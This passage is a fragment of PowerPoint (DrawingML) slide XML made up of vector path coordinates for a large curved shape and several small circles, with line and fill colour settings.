                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2380239" y="3149600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2338709" y="3175000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2253815" y="3200400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2031878" y="3263900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1985999" y="3263900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1939671" y="3276600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1892918" y="3276600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1845759" y="3289300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2575129" y="3289300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2595048" y="3276600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2634262" y="3263900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2672834" y="3238500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2710750" y="3213100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2747991" y="3187700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2784543" y="3162300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2820387" y="3136900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2855507" y="3111500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2889887" y="3073400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2923511" y="3048000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2956361" y="3022600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2988421" y="2984500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3019674" y="2959100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3050104" y="2921000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3079695" y="2882900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3108429" y="2857500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3136291" y="2819400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3163263" y="2781300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3189329" y="2743200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3214472" y="2705100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3238676" y="2667000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3261924" y="2628900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3284200" y="2590800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3305487" y="2552700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3325768" y="2514600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3345027" y="2476500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3363247" y="2425700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3380412" y="2387600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3396505" y="2349500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3411510" y="2298700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3425410" y="2260600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3438188" y="2209800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3449827" y="2171700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3460312" y="2120900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3469626" y="2082800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3477751" y="2032000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3484672" y="1981200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3490372" y="1943100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3494834" y="1892300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3498041" y="1841500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3499978" y="1790700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3500628" y="1752600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3499978" y="1701800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3498041" y="1651000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3494834" y="1600200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3490372" y="1562100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3484672" y="1511300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3477751" y="1460500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3469626" y="1422400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3460312" y="1371600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3449827" y="1333500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3438188" y="1282700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3425410" y="1244600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3411510" y="1193800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3396505" y="1155700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3380412" y="1104900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3363247" y="1066800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3345027" y="1028700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3325768" y="977900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3305487" y="939800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3284200" y="901700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3261924" y="863600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3238676" y="825500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3214472" y="787400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3189329" y="749300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3163263" y="711200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3136291" y="673100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3108429" y="647700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3079695" y="609600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3050104" y="571500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3019674" y="546100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2988421" y="508000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2956361" y="482600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2923511" y="444500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2889887" y="419100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2855507" y="393700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2820387" y="368300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2784543" y="330200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2747991" y="304800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2710750" y="279400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2672834" y="254000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2634262" y="241300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2595048" y="215900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2575129" y="203200"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="3500754" h="3492500">
                  <a:moveTo>
                    <a:pt x="1988072" y="12700"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1512555" y="12700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1466113" y="25400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2034514" y="25400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1988072" y="12700"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="3500754" h="3492500">
                  <a:moveTo>
                    <a:pt x="1894028" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1606599" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1559389" y="12700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1941238" y="12700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1894028" y="0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588980" y="4281644"/>
              <a:ext cx="379730" cy="379730"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="379729" h="379729">
                  <a:moveTo>
                    <a:pt x="210679" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="168864" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="127859" y="9128"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="89288" y="27385"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54770" y="54770"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="27385" y="89288"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9128" y="127859"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="168864"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="210679"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9128" y="251683"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="27385" y="290255"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54770" y="324772"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="89288" y="352158"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="127859" y="370414"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="168864" y="379543"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="210679" y="379543"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="251683" y="370414"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="290255" y="352158"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="324772" y="324772"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="352158" y="290255"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="370414" y="251683"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="379543" y="210679"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="379543" y="168864"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="370414" y="127859"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="352158" y="89288"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="324772" y="54770"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="290255" y="27385"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="251683" y="9128"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="210679" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="0066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588980" y="4281644"/>
              <a:ext cx="379730" cy="379730"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="379729" h="379729">
                  <a:moveTo>
                    <a:pt x="324772" y="54770"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="352158" y="89288"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="370414" y="127859"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="379543" y="168864"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="379543" y="210679"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="370414" y="251683"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="352158" y="290255"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="324772" y="324772"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="290255" y="352158"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="251683" y="370414"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="210679" y="379543"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="168864" y="379543"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="127859" y="370414"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="89288" y="352158"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54770" y="324772"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="27385" y="290255"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9128" y="251683"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="210679"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="168864"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9128" y="127859"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="27385" y="89288"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54770" y="54770"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="89288" y="27385"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="127859" y="9128"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="168864" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="210679" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="251683" y="9128"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="290255" y="27385"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="324772" y="54770"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="28575">
              <a:solidFill>
                <a:srgbClr val="0466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588980" y="6610383"/>
              <a:ext cx="379730" cy="381000"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="379729" h="381000">
                  <a:moveTo>
                    <a:pt x="210679" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="168864" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="127859" y="9159"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="89288" y="27478"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54770" y="54957"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="27385" y="89590"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9128" y="128292"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="169437"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="211402"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9128" y="252562"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="27385" y="291295"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54770" y="325975"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="89288" y="353453"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="127859" y="371773"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="168864" y="380932"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="210679" y="380932"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="251683" y="371773"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="290255" y="353453"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="324772" y="325975"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="352158" y="291295"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="370414" y="252562"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="379543" y="211402"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="379543" y="169437"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="370414" y="128292"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="352158" y="89590"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="324772" y="54957"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="290255" y="27478"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="251683" y="9159"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="210679" y="0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588980" y="6610383"/>
              <a:ext cx="379730" cy="381000"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="379729" h="381000">
                  <a:moveTo>
                    <a:pt x="54770" y="54957"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="89288" y="27478"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="127859" y="9159"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="168864" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="210679" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="251683" y="9159"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="290255" y="27478"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="324772" y="54957"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="352158" y="89590"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="370414" y="128292"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="379543" y="169437"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="379543" y="211402"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="370414" y="252562"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="352158" y="291295"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="324772" y="325975"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="290255" y="353453"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="251683" y="371773"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="210679" y="380932"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="168864" y="380932"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="127859" y="371773"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="89288" y="353453"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54770" y="325975"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="27385" y="291295"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9128" y="252562"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="211402"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="169437"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9128" y="128292"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="27385" y="89590"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54770" y="54957"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="28575">
              <a:solidFill>
                <a:srgbClr val="0466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917652" y="6610383"/>
              <a:ext cx="379730" cy="381000"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="379729" h="381000">
                  <a:moveTo>
                    <a:pt x="210679" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="168864" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="127859" y="9159"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="89288" y="27478"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54770" y="54957"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="27385" y="89590"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9128" y="128292"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="169437"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="211402"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9128" y="252562"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="27385" y="291295"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54770" y="325975"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="89288" y="353453"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="127859" y="371773"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="168864" y="380932"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="210679" y="380932"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="251683" y="371773"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="290255" y="353453"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="324772" y="325975"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="352158" y="291295"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="370414" y="252562"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="379543" y="211402"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="379543" y="169437"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="370414" y="128292"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="352158" y="89590"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="324772" y="54957"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="290255" y="27478"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="251683" y="9159"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="210679" y="0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917652" y="6610383"/>
              <a:ext cx="379730" cy="381000"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="379729" h="381000">
                  <a:moveTo>
                    <a:pt x="54770" y="325975"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="27385" y="291295"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9128" y="252562"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="211402"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="169437"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9128" y="128292"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="27385" y="89590"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54770" y="54957"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="89288" y="27478"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="127859" y="9159"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="168864" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="210679" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="251683" y="9159"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="290255" y="27478"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="324772" y="54957"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="352158" y="89590"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="370414" y="128292"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="379543" y="169437"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="379543" y="211402"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="370414" y="252562"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="352158" y="291295"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="324772" y="325975"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="290255" y="353453"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="251683" y="371773"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="210679" y="380932"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="168864" y="380932"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="127859" y="371773"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="89288" y="353453"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54770" y="325975"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="28575">
              <a:solidFill>
                <a:srgbClr val="0466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917652" y="4281644"/>
              <a:ext cx="379730" cy="379730"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="379729" h="379729">
                  <a:moveTo>
                    <a:pt x="210679" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="168864" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="127859" y="9128"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="89288" y="27385"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54770" y="54770"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="27385" y="89288"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9128" y="127859"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="168864"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="210679"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9128" y="251683"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="27385" y="290255"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54770" y="324772"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="89288" y="352158"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="127859" y="370414"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="168864" y="379543"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="210679" y="379543"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="251683" y="370414"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="290255" y="352158"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="324772" y="324772"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="352158" y="290255"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="370414" y="251683"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="379543" y="210679"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="379543" y="168864"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="370414" y="127859"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="352158" y="89288"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="324772" y="54770"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="290255" y="27385"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="251683" y="9128"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="210679" y="0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917652" y="4281644"/>
              <a:ext cx="379730" cy="379730"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="379729" h="379729">
                  <a:moveTo>
                    <a:pt x="324772" y="324772"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="290255" y="352158"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="251683" y="370414"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="210679" y="379543"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="168864" y="379543"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="127859" y="370414"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="89288" y="352158"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54770" y="324772"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="27385" y="290255"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9128" y="251683"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="210679"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="168864"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9128" y="127859"/>
                  </a:lnTo>
                  <a:lnTo>
